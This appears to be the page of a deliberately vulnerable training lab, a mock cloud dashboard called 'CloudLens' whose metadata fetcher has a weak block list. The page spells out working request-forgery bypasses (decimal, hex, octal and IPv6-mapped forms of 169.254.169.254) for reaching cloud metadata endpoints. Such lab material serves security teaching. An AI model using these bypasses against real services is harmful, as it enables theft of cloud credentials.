Bug Bounty Tip: CloudLens fetches instance metadata for analysis. A metadata service filter prevents credential theft, but alternative IP representations (decimal, hex, octal) may bypass the filter and reach cloud metadata endpoints.
Running Instances 3 Active
i-0a1b2c3d4e5f — t3.medium
us-east-1a · $42.00/mo/mo
Running
i-0f9e8d7c6b5a — m5.large
us-east-1b · $87.84/mo/mo
Running
i-0x1y2z3w4v5u — c5.xlarge
us-east-1c · $140.16/mo/mo
Running
Fetch Instance Metadata
Enter a metadata URL to fetch instance tags, IAM roles, or user-data for analysis.
CloudLens will fetch the metadata endpoint for analysis.
Metadata Security Policy
The following destinations are blocked from fetching:
  • localhost
  • 127.0.0.0/8 (any 127.x.x.x)
  • 169.254.169.254 (AWS/Azure/GCP metadata)
  • kzlabs.in
  • 142.93.35.49
Where Bug Hunters Find This
  • Cloud cost optimizers and instance inspectors
  • Serverless function testing consoles
  • Container build pipelines fetching external resources
  • CI/CD runners with network access
  • Web application firewalls with misconfigured bypass rules
  • Cloud migration tools
Common Bypass Techniques
Decimal IP
http://2852039166 = 169.254.169.254
Hexadecimal IP
http://0xa9fea9fe = 169.254.169.254
Octal IP
http://0251.0376.0251.0376 = 169.254.169.254
IPv6 Mapped
http://[::ffff:169.254.169.254]